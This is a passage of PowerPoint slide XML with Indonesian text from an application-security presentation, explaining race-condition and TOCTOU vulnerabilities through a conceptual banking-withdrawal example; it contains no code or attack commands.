              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web dan cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perlombaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan TOCTOU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlombaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejadian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimanipulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprediksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlombaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejadian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> time-of-check to time-of-use (TOCTOU), di mana status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bayangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-threaded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> thread program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saldo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uang. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanipulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penarikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggarisbawahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
